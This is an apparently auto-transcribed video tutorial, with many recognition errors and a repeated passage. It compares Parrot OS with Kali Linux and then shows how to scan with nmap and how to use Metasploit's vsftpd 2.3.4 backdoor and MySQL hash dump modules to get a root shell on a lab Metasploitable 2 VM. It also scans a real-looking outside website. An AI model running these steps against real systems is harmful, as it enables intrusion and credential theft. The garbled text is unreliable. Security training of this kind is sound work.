usually nmap scan is
about more than thousand votes

as you can see.
It says 992 of the clothes pose

and these are the open ports
and suppose you want to know

more information about each Port
because basically if your hacker

if you try to hack something you
don't need information

about all the ports.
It's basically the One port

which you want to so to know
that you can there are

a lot of options
which are provided by a map.
If you want to know more

about by and Map There's
and video and I'd wake up

playlist all about in map.
It's under network security.
So you make sure

to take a look at that.
So while you are taking a look

at particular device,
make sure you go ahead

and watch a video
on Kali Linux as well.
So you will know

how different Heroes
and color index are
though they are similar

in few parts.
So that's it about system

as in parrot OS so
like I said, it's
On good-looking distro,
which is lightweight
and lot of tools lot

of unique tools as well.
When compared to Kali Linux and

it's very smooth away smooth.
Oh apart from all

these good things.
There are a few things
that are problematic

with part ways.
First of all,
like you don't find

our search body.
Oh, that's not a problem.
But that's one demerit
you can say and it's

also a little problematic
when it comes to launching your

application the process LL slow
and like Carla lineage.
So guys, this is your

parrot OS so basically Lee
this was a crisp video
on what parrot devices

it's review its features
and all that and make sure
to watch a video on pero no es
versus Kali Linux.
So Linux has been known

for its various distributions
that cater to various needs one
of the most famous

distributions is Kali Linux
that is a penetration
testing oriented distribution,
which was built to bring
about much-needed Corrections

in its previous.
Duration known as
backtrack OS now
since the release of Kali Linux.
It has gone
under various iterations

in the form of updates
while other penetration testing
and security related

distributions were also
being developed all

around the world.
So in this session,
we will compare Kali
to One Source distribution that

has come under the spotlight
and that is parrot OS

so today in this video.
I will first be giving you

guys a brief introduction
to what exactly is Kali Linux.
And then I will also give

a brief introduction to
what parrot OS is then

we will be comparing Kali
versus parrot according

to various parameters.
So let's move ahead now.

a brief introduction
to what Kali Linux is.
So Kali Linux is a penetration

testing and security
focused operating system
as the name suggests Carly has

a Linux kernel at its core above
that the creators

of Carly Marty are Oni
and Devon Kearns.
Added the latest injection

packages to help pentesters.
Save some time Kali Linux has

developed according to the DB
and development standards
and it was developed as

a refined penetration test
during distribution.
That would be served as
a replacement for backtrack OS

currently the development
of Carly is being handled

by offensive security,
which is the organization
that provides prestigious

certifications, like oscp osce
and Os WP over the years.
Carly has developed its own cult

following with people
who swear by the word and by

the power provided by Kali
while I may not be
such a staunch believer
in Kali Linux.
There are plenty of reasons

for want to use curly for one.
It's absolutely free.
Secondly.
It comes pre-installed
with tons and tons

of penetration testing tools
and security related

tools above that.
It can be completely customized

according to your needs
as the code is
an open-source get tree
and The whole code

is basically available
to the public to be tweaked.
Also the kernel
that runs Kali Linux comes with

the latest injection packages.
And it also comes

with gpg signed packages
and repositories above that.
Kali Linux has

some true multi-language support
and it was developed in

an extremely secure environment.
Also Carly supports a wide range
of wireless devices now

at this moment Callie
may seem like a very

useful operating system.
But as you guys might

remember the great quote,
From Spider-Man create

power comes with
heavy resource utilization
according to the official

documentation of Carly
the system requirements

are quite heavy
on the low-end Kali Linux
needs a basic of at
least 128 MB of RAM
and a 2 GB hard disk space

to set up a simple SSH server
that will not even have

the GUI of the desktop
on the higher end.
If you opt to install

the default genome desktop
and the Kali Linux

full meta package.
You should really Aim

for at least round 2 gigs of RAM
and around 20 GB
of free hard disk space

now besides the RAM
and hardest requirement.
Your computer needs to have

CPU supported by at least one
of the following architectures

them being amd64 i386
and Armel and AR M HF

and also arm 64 now,
even though the official

documentation says 2GB
of RAM is enough.
I have personally
faced numerous lag
and stutter issues
when running Carly

on a virtual machine
with 6G EB of allocated Ram
which in my opinion
is a definite bummer.
Now, let's take

a moment to discuss
about parrot OS so parrot much
like Carly is also a deviant

based distribution of Linux.
When I see Debian based,
it means that the

code repositories adhere
to the Debian development

standards para Todo es 2 comes
with its own arsenal

of penetration testing
and security related tools.
Most of these tools are

also available on Carly.
No, but it was first

released in 2013
and was developed by

a team of Security
Experts Linux enthusiasts

open source developers
and Advocates of digital rights.
The team was headed

by Lorenz of Elektra
and part is designed

in a very unique way
while the operating system

has everything that is needed
for a security expert.
It doesn't present itself
to be a daunting learning
experience for beginners
who want to set foot into

the world of ethical hacking
and vulnerability analysis.
But it OS can be very well

used as a daily driver
as it provides all
of the necessary tools

to complete day to day tasks.
So who exactly is peridot

s made for well,
first of all,
it is made for Security Experts

and digital forensic experts.
It can be also used by

engineers and IIT students
who are enthusiastic

about ethical hacking
then parrot OS can be also used

by researchers journalists
and hacktivists and last
but not the least

but it OS is also meant
for these officers and

special security institution.
Okay.
So now let's take a moment
to actually discuss
the system requirements
that one might need

to run parrot OS
so the system requirements
for Bharat is much

more forgiving than Kali Linux
on the CPU side.
You need an x86 architecture

with at least 700 megahertz
of frequency and architecture.

Why is you need i386 amd64
or AMD 486 which is basically

the X86 architecture
or are male and Armature
which are basically iot devices

like Raspberry Pi on the side
of ram you need at least 256 MB
on a nine three eight six

architecture three a 20mb
on an amd64 architecture
and as a general
documentation 512mb
of RAM is generally recommended

by the parrot zik OS people.
On the GPU side parrot

OS is very surprising
as it needs.
No graphic acceleration.
That means you can run this
without a graphic
card on the side
of hard disk space pirate

OS needs at least 16 GB
of free hard disk space

for its full installation.
That is for G 4 gigabytes

Left 4 gigabytes
lesser than Kali Linux and for

booting options both Kali Linux
and parrot OS have

the Legacy BIOS preferred.
Now comparing two operating

systems when it comes
to Parrot OS and Kali Linux
that are both operating systems

meant for similar purposes
that is penetration.
Testing.
In this case.
It becomes really tough.
Most of the factors in such

cases boil down to a matter
of personal taste rather

than an objective comparison.
Now before we move ahead

with the comparison,
let me list out

a few similarities that you
might have noticed between

the two operating systems.
So first of all,
both operating systems
are tuned for Operating

penetration testing
and network related tools
and both operating

systems are based
on Debian development standards

both of the operating system
Support 32 and
64-bit architecture
and both operating systems

also support Cloud VPS
along with iot devices.
And of course,
both of them come pre-installed

with their own arsenal
of hacking tools.
Now, let's get down

with the differences.
The first criteria
of differences that we are going

to discuss is Hardware.
Points now as you guys
can see on the slide.
I have put down the system

requirements of parrot OS
on the left hand side
and I have put down the system

requirements of Kali Linux
on the right hand side.
So as you guys can see parrot OS
and Kali Linux both need

1 gigahertz dual-core CPU
when it comes to Ram parrot

OS needs much lesser arm
than Kali Linux,
but it needs 384 MB of RAM

for its minimal running time
and Kali Linux needs

a 1 gigahertz of RAM.
The other hand in terms of GPU,
but it OS doesn't really

need a graphic card
as it has no need
for graphical acceleration Kali

Linux on the other hand.
If you're trying to run

the genome desktop version,
you will certainly

need a graphic card
on the other hand pirate OS need

16 GB of free hard disk space
for its full installation
and Kali Linux needs

20 GB of free space.
So basically parrot OS is
a much more lightweight version.
So we see that parrot

OS definitely wins
against Kali Linux
when it comes
to Hardware requirements due to

its lightweight nature not only
does it require lesser Ram

to function properly,
but the full installation is

also pretty lightweight thanks
to the use of the mate desktop

environment by the developers.
So basically if you're having

an older Hardware configuration
on your computer pirate

OS should definitely
be your choice.
Now the next parameter

that we are going to compare.
The two OS is in is look

and feel now this section.
Be boils down
to personal choice personally.
I prefer the minimalistic look
that is given by parrot OS

the interface of parrot OS
is built using the Ubuntu

mate desktop environment.
There are two clear

sections on top you
see a pain which contains

applications places systems,
which is much like Kali itself,
but it also gives

some cool information
about CPU temperatures

along with the usage graph
and the bottom pane

contains the menu manager
and the work station manager,
which is a brilliant addition
to the Linux system Kali Linux

on the other hand follows
the genome desktop interface
while it still
has the functionality
that is offered by para Todo es.
It doesn't provide
the same clean and refined
look in my opinion.
If you don't know your way

around a collie interface,
it is pretty easy
to actually get lost.
Now, the next parameter
that we're going to compare

them is hacking tools now
since both these

operating systems are
For penetration testers

and ethical hackers.
I think hacking tools is

the most important criteria
that both the operating systems

are going to be compared in so
when it comes to General tools
and functional features para

Todo es takes the price

pirate OS has all the tools
that are available in Kali Linux

and also it adds his own tools.
There are several tools

that you will find on parrot
that is not found on Kali Linux.
Let's take a look

at a few of them.
So the first on that you

see is called Wi-Fi Fisher
now Wi-Fi fish oil is

a rogue access point framework
for conducting
red team engagements
or Wi-Fi security testing using

Wi-Fi Fisher penetration testers
can easily achieve a man
in the middle position

against the wireless clients
by performing targeted
Wi-Fi Association attacks.
Wi-Fi Fisher can be further
used to mount victim

customized web phishing attacks
against the connected clients

in order to capture credentials
or in fact the victim
With some sort of

malware another tool
that is seen on parrot

and is much appreciated
that is not seen
on the Kali sign is called

a non surf now being anonymous
for a hacker is the first step

before hacking a system
and anonymizing a system
in an ideal way is
not an easy task.
No one can perfectly

anonymize a system and there
are many tools available

on the internet that see
that they are no no my system

one such tool is
a non surf now, announce.
So of is pretty good
as it uses the tour iptables

to anonymize the whole system.
Also, if you guys

have not already realizes
tour also also comes

pre-installed on parrot
while it has to be externally

installed on Carly.
Now these things that you see
that Wi-Fi Fisher Tor Browser
and announcer surely

they can be imported
and download it on curly

but they don't really come
pre-installed and that is

what counts right now.
So since pirate OS
also Is designed
with development in mind

it also comes pre-installed
with a bunch of useful compilers

for various languages
and ideas for their

respective development,
which is completely absent

on the Kali Linux side.
So for this part of hacking
tools parrot OS definitely takes

a price now the next thing
that we are going
to compare both y'all both

these operating systems is
release variations now

both operating systems come
with a variety of variations,

but part OS has
much more diversity
in terms of variety.
So let me just explain

what I mean.

on the left-hand side,
I have listed down

the release variations
that are available

for parrot OS now aside
from the full editions,
which is both provided

by parrot and Kali.
They also both provide the light

additions on parrot side
and the light Edition

on Carly side.
They are both basically

the same thing.
We're in minimalistic tools

are actually pre-installed
and you can Install and

customize the operating system
according to your own needs.
If you don't choose to customize

the operating system,
you can very well use

it as a very lightweight
and portable operating system.
So Peridot a slight addition
and Carly light additions

are two flavors
of the operating system.
Now, this is
where the difference is

such differences start.
So parrot os are
Edition also exist.
So this is an addition
that is used
for wireless penetration,
testing and wireless

vulnerability testing.
So basically anything
Thing Wireless parrot
OS erudition does it faster

and does it better then?
There's also parrot

OS Studio Edition,
which is used for multimedia

content creation Yes.
You heard that right part

it OS can also make content
for your social media.
So if you're thinking
about using part OS
for marketing as well as

security deposit OSU has
definitely your go-to

operating system Carly
on the other hand aside

from its light version
and full edition offers.
Some desktop interfaces
like the E17 KDE and xfce

the Ubuntu mate and the lxde.
So these are
basically just skins
that run over Cali
and basically make

Ali look a little different
from one another you

can check out all
these different customizations
on the khari documentation.
Other than that Callie

has also support for cloud
and iot devices in the form of

the Armel and arm HF releases.
These releases are

also available in parrot over.
ESO para Todo es

doesn't stand down.
So as you guys see Peridot s
provides you a lot

of diversity in the variety
that it is offering.
So in my opinion parrot
OS also takes the price
in this section.
Now the main question remains
which of these two distributions

is better for beginners Well,
it is to be duly noted
that both these distributions
are not exactly

meant for beginners.
If you want to learn about Linux

as an operating system,
you're better off using

something like Go bond
to or deepen.
This also doesn't mean
that you cannot learn

the basics on parrot
or Kali on the other hand.
If you are already knowing

the basics of Linux
and want to get your hands
on an operating system
to learn ethical hacking.
I would personally recommend

using the parrot SEC OS light
addition this is
because the light version comes

with the bare minimum
of networking tools.
This means as you learn
your ethical hacking concept

slowly you could develop
or install tools one by one.
Instead of being overwhelmed

with a whole bunch of them
from the beginning not only

does this allow yourself
to evolve as an ethical hacker
and penetration tester,
but it also makes sure

your fundamentals are built
in a methodical manner.
Now, I recommend parrot OS /
Carly for one other

reason to that is
because the default user

for Callie is Route.
This makes the environment

a whole lot more aggressive
and mistakes tend to be punished
and a whole lot more difficult

to deal with So this means
that parted OS is generally

the winner in my opinion.
When you get hired as

a penetration tester
or a security analyst one
of the main rules

is vulnerability assessment.
So what exactly is
vulnerability assessment?
Well, I've already possessed

man is the process of defining
identifying classifying
and prioritizing vulnerabilities

in a computer system application
and network infrastructures
and providing organization

doing the assessment
with the necessary

knowledge awareness
and risk background

to understand the threats
to its environment
and react appropriately to them.
So vulnerability is a situation
that can be taken

advantage of by a hacker
or a penetration tester
for their own misuse or actually

for fixing the issue.
So while I'm ready assessment

has three steps.
So the first step is actually

identifying the assets
and the vulnerabilities

of the system.
The second step is actually

quantifying the assessment
and the third is reporting

the results now vulnerability
assessment is only a small part
and Pen testing is

an extended process
of vulnerability assessment
when testing NG
or penetration testing
includes processes like scanning

vulnerability assessment
and itself exploitation research
and Reporting whatever

the results are.
So in the industry
was the most widely
used Frameworks when penetration

testing is Metasploit.
So Metasploit is widely used

in penetration testing
as I just said and also used

for exploitation research.
So some of you might ask
what exactly is
an exploit research well
in this world there

are tons of exploits
and the way to approach each

Of them is ever so different.
So what we have to do
is exploit all the research
that is available to us
and we have to find

the best way to approach them.
So suppose, for example,

you have a secure shell login.
So the best way to actually

approach secure shell login
until my knowledge is
that you have to get

a backdoor access
to this from the port numbers
that you can scan

via nmap or eczema.
Okay.
So without wasting
much time at looking
at prop and presentations,
let's actually get started as

to how we can use Metasploit.
So So Metasploit is a freely
available open source framework
that is widely
used by pentesters
as we just discussed.
So to actually
install Metasploit,
which is easily available

on Linux and windows.
I guess.
Let me just check it out.
So you go on your browser
and you time Metasploit

downloads now you just
visit the first link and
as you guys can see it says

it's the world's most
used penetration testing tool
and then you just download

the Metasploit framework
by clicking the
download button here.
So y'all might also

find Pro version
which is a paid thing.
And this has a little bit

of extra features
like group support
and actually helping a company

work as an organization,
but we don't actually need

that and practicing
our pentesting abilities.
So for that you just go ahead
and download Metasploit

framework and install it
on your system above
that there is another thing I

want to get make you guys aware
of and that is Metasploit table.
So when actually
been testing we need a server
or a website to actually
pen testing zone.
So normally this is
a very illegal thing to do

with our permission.
Ian so Met exploitable

has actually created
a server with a lot

of vulnerabilities on it
and it's called Metasploit

able to somet exploitable
to is easily downloadable
from this link
and it's a virtual box file.
So you guys must have

a virtual machine software
on your system to actually

set this thing up.
I'll also go through
how to actually set

up Metasploit herbal
because it has a lot
of configuration and network

management to go with it.
So we'll get to that later.

But for now,
let's get started

with Metasploit table.
So before that Metasploit herbal

is written in Ruby
and if you all know

Ruby coding and y'all know
how to make exploits
y'all can also always contribute

to the Metasploit community.
So Metasploit is one of the most

widely used pen testing tools
in the industry.
So what exactly is Metasploit?
Well, it's a framework
and what a framework is is it's

actually a collection of tools.
So these tools are majorly used

for penetration testing
and exploitation research

now one might ask
what Exactly is
exploit research.
Well, there are tons

of exploits out there
and there are tons of ways

to actually approach them
and this only comes to us
from thorough research as

to how we can approach each
and every exploit

in their best way.
So talking about Metasploit.
Well, it's open source and free

and it's also written in Ruby.
So if you guys know

Ruby coding and know
how to make exploits
y'all can always contribute
to the Metasploit framework now

talking about the download part.
Well y'all can easily

download Metasploit
from its download page,
which is -
Floyd.com download I'll

be leaving the download link
in the description.
And once you're

on the download page,
you'll see two versions

one is the free version
which is the original

Metasploit framework
and it's the core framework

that everybody works on
and then there's Metasploit Pro
which comes with

a 14 day free trial.
So Metasploit Pro actually

has a few extra features,
which is great
for an organization.
Like it helps
you work as a team,
but if you're a guy
who's just practicing pentesting

like me Metasploit framework,
Work the free version is

the absolute way to go now.
Also when pentesting
you all will also need

Metasploit table now met
exploitable is an intentionally
vulnerable Target machine
for actually practicing
your medicine flight skills
on so we will go
over the installation

of Metasploit table later.
But for now, let's go

over Metasploit table.
So once you guys

have actually downloaded
the link y'all can actually

install it on your systems
and Metasploit actually

has three interfaces.
So we are going to be using

the command line interface.
Or the msf console

in other words,
but you all can also use the GUI

interface which is called
Armitage if I'm not wrong.
So first of all,
I've already actually

downloaded Metasploit
and install it on my computer
and y'all can just do the same

by pressing the download button
as you guys can see so

just start up Metasploit.
All you have to do

is go on your terminal
and so to start a Metasploit

all you have to do.
Do is go on your
terminal on Linux?
Well, we're starting

upholstery SQL Server
because first of all
the postgresql server
is the basis of all

the Metasploit exploits
that are stored and starting it

will just make it run faster.
So we go service post
gray SQL and start
so that's the start of a service
and indeed it has so next thing

you want to do is go in
and type msf console.
And that's going to take

because I was very slow computer
and it's going to start

up our Metasploit free.
So as you guys can see you got

a big banner out here.
It says Metasploit cyber mesial
and it's the banner changes

every time don't get worried.
If you have a different banner

and the main thing is
that you should see

this msf thing out here.
So this means we are

in the msf Shell right now,
which is the
Metasploit framework shell.
So let's get started by

actually curing our screen.
So first things first

the first command that you
might want to run on a deployed

is the help command.
So help will tell us everything
that we can do
with this framework.

there are a bunch of commands
and the descriptions

to go along with it.
Y'all can give it a quick read

and find the things
that are interesting to you.

Banner is display
an awesome Metasploit Banner

y'all can change the banner
as you guys can see there are

a lot of Juicy commands
like there's a banner command,
which I just had used.
So if you go and die panel

will give you a nice cool Banner
about Metasploit and there

are other commands
which work very similar

to Linux like CD.
Changes the current directory

you can change the color
by toggling colors
and then you can connect to

the host and all sorts of stuff.
So Metasploit has
a bunch of exploits.
So before we go further,
I want to make you guys aware

of three important terms
regarding Metasploit.
The first is a vulnerability and

we had already discussed this
that a vulnerability
is a situation
which can be taken advantage
of by a system or a person
who axis so the second

part is an exploit.
So what exactly is
an exploit Yeah,
well an exploit is a module
which is a bunch of code written

in Ruby on Metasploit
that is used to Target

different vulnerabilities.
And the third thing

is a payload.
So a payload is
the action that you do
once you actually have access

to somebody system.
So basically suppose
you have hack somebody
and you've gained access

to their system.
Now the activities you do

after gaining access
is defined as the payload so

we just spoke about exploits
and I told you guys
that Metasploit has

a bunch of Right.
So how do we see all

the exploits that are there?
So you go show exploits.
Well, as you guys
can see we've loaded

up a bunch of exploits
which is basically
all the exploits
that Metasploit has

to offer at this moment.
So let me just increase
the screen a bit and let's cruel
completely to the top.
Yep.
show exploits give us

a bunch of exploits
and shows the name a description

a disclosure did and the rank.
So the name and description is
as it says it's the name

of the exploit and it's
a short description about it.
The disclosure date is
when the extract was actually

released by Metasploit
and the rank is
how it has fared

against the vulnerability.
It was released for

since it was actually released.

ranks range from Great good
and stuff and we have

a bunch of exploits.

there's an Android exploit.
There's a Samsung Galaxy

knocks Android exploit.
There are bunch

of Windows exploit
Adobe Flash exploit FTP exploits

MySQL exploit asp.net exploits
and a bunch of other stuff.
So as you guys can see there are

a bunch of exploits to use
and it can get confusing

and rather Troublesome
to search for the exploit.
You actually want to use so
as A pen tester you can always

go for the search keyword,
which is basically suppose,
you know that you

have a MySQL server
which has a bunch
of vulnerabilities and you

want to test those out.
So you simply go
search my SQL now,
I'll search the database

for all the exploits
that are related to mySQL

and present them to you.
Okay, so we have our results.

we have a bunch
of MySQL related module system.
Now at this makes it very easier

if you are a pen tester
and you're looking

for MySQL exploits
now suppose you choose

your exploit and let's see,
let's choose.
Which one do we
want to use today?
We're going to just use

this MySQL hash dump.
So to actually use
this we have to copy
the knee so double click on it

and it'll just select it and New
go Ctrl shift C
in your terminal
so that copies it and so
if you want some more

information about it,
you can always go info
and then just paste

in the name of the exploit.
So this gives us a bunch

of information actually
gives us all the information

you need about the exploits.
So it gives you the name

that it's a MySQL password.
Hash dump its module name

is Ox Terry scanner
and all this stuff.
It's licensed by Metasploit.
Framework in itself
and it has a normal rang
and these are all the options

that you might need to set
when actually using the exploit
and this also gives you

a small description.
So it says this module

extracts the user names
and encrypted password hashes

from a MySQL server
and stores them
for later cracking so seems

like really cool stuff.
You can do with ice cubes server

and its password database.
So if you actually
want to use this
so you have to use

the use keyword.
So we go you Who's
and control shift V?

it's denoted in red out here
that we are indeed and exploit

that we want to use.
Now.
The first thing you want to do
when you're using

an exploit is you want
to go and say show options.

these are the options
that we actually need to set

before using the exploit.
Now the options can be necessary

or they can be optional
like so there's
a password field out here,
which is not really necessary,
but will help your exploit
if you actually provide it

but you need to provide
the our hosts
which is the targeting

host machine and the port
and the threads is already

set now suppose you want
to set the our hosts
so you can just go set.
Host and you can set it

to whatever IP address
you want like suppose you want

to address 192.168.1.1 56 some
of that sandwich.
I will set the our hosts.

You can also set the number of
threads now threads are actually
what the threads mean

and parallel processing
that mean how many parallel

threads you're gonna run
so that you have

faster computation.
So this means new need GPU power
if you have multiple threads

running So let's set
threads 234 now
so we've set the threads 30
and then you can go

show options again and see
that you have indeed

actually set your options.
So we've set the threats to 30

and our host has also been set.
So that was all about how you

can get into a module know
get some information

about a module and
how can also use them or you
so once you're done

using the module
or once you're done

setting up the options,
You can go ahead and run

the command run or even exploit
and this will start actually

running exploit on the system
that we want to now of put

in a very arbitrary IP address.
So and that not have

MySQL Port running
so our exploit feel now
once you have desiderio exploit

and you want to go
back to the main msf.
Unix shell just go

ahead and type back.
It's as simple as that so
that brings us back

to the msf command line.
I'm so let's go ahead

and clear our screen now.
Okay, so it's time

to do something interesting.
So to do that.
First of all,
we need to go ahead
and actually download

Metasploit able to so
download Metasploit able to do

you have to go on this link.
I'll leave the link

in the description.
So or rather you can just

go on your browser
and type in Metasploit able

to download so met exploitable
as we had earlier discussed

is a Linux based distribution
and It's mostly meant
for actually practicing

your pen testing skills.
So basically it has a bunch

of ports open on it.
So it's basically
just for your he's
so that you don't go ahead
and test it out

on some valid website
and then get thrown into jail

because that's a very
illegal thing to do.
So go ahead and download

Metasploit able to and then
also download Oracle virtualbox

machine Oracle virtualbox.
So you all can

also easily download
that from www.virtualbox.org.
And this is
because you should never run mad

exploitable to on a system
that is connected to a network.
You should always use it

on a virtual machine
because it's Protected

Their Faith so
that nobody else can access it.
So to actually set
up Metasploit table.
Once you've downloaded

it you go ahead
and open up your virtual box.
So out here you have

to go into Global tools
and you create a host only

network manager now already
created a host only network

manager and then you go ahead
and enable the DHCP server

by pressing this out here
like enable then you go back
and you just go new you give it
a name like whatever

you want to name it.
I have already named

mine Metasploit with to
as you guys can see.
So we're going to call this demo
for just demonstration purposes

choose a type to be Linux
and it someone to 64-bit click

next give it a gig of RAM
and you are going to use

an existing virtual hard disk
so out here you just click

on this button out here
and Browse to the place
where you actually downloaded
and unzipped your Metasploit

will download file.
Then you get this virtual

machine disk file,
which is with vmdk file
and you just go ahead

and load it up.
So I'm not going to do
that again because that's just

going to eat up my Ram
and I've already

installed it up to you.
So that was all

about the installation
and the configuration.
So now let's get started

and let's start playing
around with Metasploit.
So once you're done downloading
and installing Metasploit table

on your computer,

Is go ahead and start it up
in your virtual box machine

and the login ID
and the password both are msf.
Admin.
So first of all,
we need the IP address

of our Metasploit double server.
So we go ifconfig
and this gives us the address.
So as you can see out here

are addresses 192.168.1.2 6.
101.
So once you've go ahead

and started a Metasploit herbal,
it's time that we go ahead and

exploit all the vulnerabilities
that is presented to us by meds.
Able to so do that.
Let's head back

to our Linux terminal again.
So once we have the IP address

that was 192.168.0 6.11
if I am correct,
so let's go
and quickly get a little bit

of information about that.
So who is 192.168.1.1
6.1 o 1 so this will give us
who is on Metasploit able to

and will give us a bunch
of information as to To
how the server is set up
where is set up?
The ports are open

and various other things.

this gave us a complete
who is so to get
some more information
about our Metasploit.
Double Servo.
We're going to be using nmap.
Now.
If you guys don't know about

how to use nmap you can go out
and check my other video

on the playlist of made
a pretty good and map tutorial.
So we go and map -
F - s and V which is
steel version and we give it.
the name or the domain name

server and 2.16 856 R11
So we've got a juicy result

out here and we can see
that there's a bunch

of stuff open.

there's the FTP poor open,
which has a version

of vsf tpd 2.3.4.
There's also openssh,

which is for .7 P1 DPN.
There's also tell languages

almost miserable to have talent
running on your computer.
Then there's SMTP.
There's HTTP and there's

a bunch of ports open
as you guys can just

see on your screen.
So it's We actually used

Metasploit like a pen tester
to go ahead and test

out these vulnerabilities.
So let's choose
these FTP things.
So we have this fdp out here.
So from the version number,
which is given to us by
the steel version flag
on and map we know

that it's using vsf tpd 2.3.4.
So we can easily search for

an exploit of the same version.
So as a pen tester you

would go search V SFTP D 2.3.4.
So this should give

us all the exploits
that are available for

this particular vulnerability.

after a long search
from the search vsf tpd,
we found a vulnerability
or an exploit that can take

advantage of the binary.
So it's time we
actually use this.
So first of all,
let's get some info

about this so info.
Let's copy down this thing
and then let's get

some info about this.
So as a small module description
says this module exploits

a malicious back door
that was added to be

SFTP D download archive.
This backdoor was introduced.

In the vsf tpd, 2.3.4,
tar.gz archive between June 30th

and voila voila.
So we have the options

of setting in our host.
It has an available targets

provided by these guys,
and it's a pretty good

exploit in my opinion.
So let's go ahead and use it.
So we go use
and love the exploit.
So it's visible to us
that again entered

exploit module which is eunuch /
FTP SFTP D 234 back door.
So what we're going to do is

we are going to actually
gain a backdoor access

to our met exploitable system.
So to actually make
this more believable.
So if you guys go into

your Metasploit herbal system,
so you guys can see
that That you are

in the root directory
so you can gain some root access
by going sudo Su
and going msf admin.
So we're now
root user in the msf.
Admin or rather
the Metasploit will console.
So if we go LS we can see
the various files and
if you go sleepy / home

when the home directory now and
if you do LS out here we can see
that there are a bunch of stuff.
So there's an FTP folder.
There's a hack Folder there's

a times of admin folder
and the service in this user.
So that's five folders
if you guys remember so now
what we're going to do is

we're going to gain
some back door access

into the system
and we're going to create

a bunch of folders
in the home directory.
So let's get on doing that.
So to do that we head back

to our marriage like terminal
and we go show options
as we had already
entered are exploited.
So go show options.
So as we see the options
that we have to provide is

the ER host and port number
now the port number

has already been set
because it's 21.
That's where FTB runs
or other TCP runs and we now

just have to set the host.
So to set the host we have

to just put it in the IP address
of our Metasploit herbal server.

So if I remember
correctly it set our hosts
to 192.168 / 56 Art 101.
So that has said are our hosts

so we can again check
that if we've done it correctly

by going show options.
And we indeed
have set our hosts.
Now.
All we have to do
is run the exploit.
So we go and hit run.

we have actually gained
a back door service

has found and handling
and the command shell session

has started now you
might be confused as to why

do I have this blinking line?
Well, this blinking

line actually means
that you are inside

the Metasploit herbal server.
That means we have already

gained the backdoor access
and is taking line denotes
that we are on the terminal

of Metasploit able to now
if you don't guys

don't believe me,
let's do some experimenting.
So as I had said,
I'll create a bunch of folders

in the home directory.
So let's change
the home directory first
or rather first.
You can also do a

who am I and instead you
that you're the root user

next you go and do CD / home
and I'll change

the home directory.
Now, let's make

a bunch of folders
like make directory.
This is a test.
So that should have

made a directory.
So let's go into
that directory CD.
This is a test.
So we're already
into the directory.
This is a test.
Now.
Let's make a file

called targets Dot txt.
So that creates 12.
So just to see
if you have actually

done it properly.
Let's go back
to our Metasploit herbal.
So Now in the home directory

you go and type in LS again.
Okay.
So let's type in LS and see so
as you guys can see

we have created.
This is a test folder

and it's already available
then so let's go
and move into that folder.
So this is a test and we

are already in that folder.
So I'm we are also

created a text file
which was called targets.
So that was LS
and it should give us

a Target start txt.
So as you guys just saw

we gained a backdoor access
into a remote system

through a vulnerability
that was available

to us on the FTP.
Port so we first did
that by scanning
the entire domain name server
of Metasploit table by nmap
and gaining some intelligence as

to what ports are running
and watch boats

are actually open
then we found out

that the FTP port is open.
Then we went on to Metasploit

and we found out exploit
that vulnerability very

successfully we found out
how to use the exploit
some information about

that exploit and in the end,
we actually executed at months
and we are already

in that folder.
So and we are also
created a Text file
which was called targets.
So that was LS
and it should give us

a Target start txt.
So as you guys just saw

we gained a backdoor access
into a remote system

through a vulnerability
that was available

to us on the FTP Port.
So we first did that by scanning

the entire domain name server
of Metasploit table by nmap
and gaining some intelligence as

to what ports are running
and what sports

are actually open.
Then we found out

that the FTP port is open.
Then we went on to Metasploit

and He found out exploit
that vulnerability very

successfully we found out
how to use the exploit
some information about

that exploit and in the end,
we actually executed at months.
Now you guys must be wondering
what exactly is and map

and why should I learn it?
Well and map is

a network scanner
that is widely used by

ethical hackers to scan networks
as the name suggests.

Now, you might wonder why
do I need a network scallop?
Well, Let me give

you an example.
So suppose you have a Wi-Fi
that has been set up

in your new house
and you realize
that your data is being actually

consumed at a faster rate
than you are using it.
Now.
You have suspected
that it's your pesky neighbor

who keeps on connecting
to your Wi-Fi and eating

up all your data.
So to actually confirm
all your doubts.
What you want to do

is a network scan
and nmap is a pretty

wonderful tool to do
that now nmap runs on Linux.
Mac OS and windows
and I'm mostly going

to be running this on Linux
because that's what I do most

of my penetration testing
and network testing on
so let's go ahead and get on
with the installation

of nmap on your computer.
So what you do is go
apt-get install and map now
for this you have

to be logged in as root.
If you're not logged in

as root just add pseudo
before this whole command

and it will install it now.
I already have nmap

installed so Um,
not really going to install

it again and again,
so let's just go ahead and just

do a few scans on our website
that is www.eddecosta.com
and we are going to see

what we get back as results.
So first of all,
let me just show you
how you can scan a certain

domain name servers or DNS.
So at map we are going to use

a flag all the time now,
let me just tell

you what our flag.
So if you just go
to nmap and type - -
help this will give you

all the flags and options
that are available

to Actually use on any map.
So if you are actually stuck

and you can't remember stuff,
let's go in and type and Mom -
help and it will give you all

the stuff now Network scans
generally take a long time.
So I'm going to be using

the fast mode most of the time.
So for fast mode,
all you have to do is type

in any record dot go and sit
and wait for this

can't get over now
when the scan gets
over you will see a bunch of

information and let me just wait
till that information pops up
and then we will talk

about the information together.
Okay.

our scan has been completed
it took 13 .71 seconds

to actually do the scan.
Now as you guys can see it shows

us the port's the states
and the services now the porch

is basically the port number
which are service
that is also bind it

to is working on so we can see
that SSH service is working
on port number
22 SMTP on 25 actually
Beyond 80 our PC by 911 and Sgt.
BS on 443 so that is
how you can use nmap

to scan a certain website.
Now if you see and map

has also given us
the public IP of the DNS
because what nmap does

is it looks at the DNS
and then translate it to an IP
that is recognized
to that DNS server.
So nmap.
Also Returns the public IP.
So what we can do
also is and map -
F and 34.2 10.2 30 and Dot.
35.
Okay.
that our command also works

when we put in the IP address
and it produces
the same results.
Now we can also scan
for multiple hosts now

suppose you are on a network
and you want to scan

for multiple hosts now.
You don't really want to run

different commands for that.
Now what you can do is just go

in and type and map and a bunch
of IP addresses like 192.168.1.1

and Or 1.2 and 192.168.1.3
and what this will do is it

will draw the net Maps scan
on these three
different IP addresses
and you did this

in just one command.
So that's a way
that you can do this.
Now.
You can also know about
how much of your scan is left

by just pressing the up button
so that will tell you

and give you a constant update
on how your scan is going like -
32.4% Dot and 4.7 now
and also show you kind

of the time remaining.
Okay.
So till this port

scan is going on.
Let me just tell you

about the states now States
can be of two types

open closed and unavailable.
Sometimes you will see that

it is unavailable and that's
because some sort of 5

all or something is running out
there states can also be closed

in that case mostly
and math will not return

you any result
unless you're explicitly finding

something of the closed state.
So that was a little trivia

on States and how they work.
How much are Scott has done
so a scout is dot 81% takes

around another 20 seconds.
It should be done soon.
Now.
This scan could be significantly

made faster with just EF tag,
but I really want to give

you all a good look
into how this works.
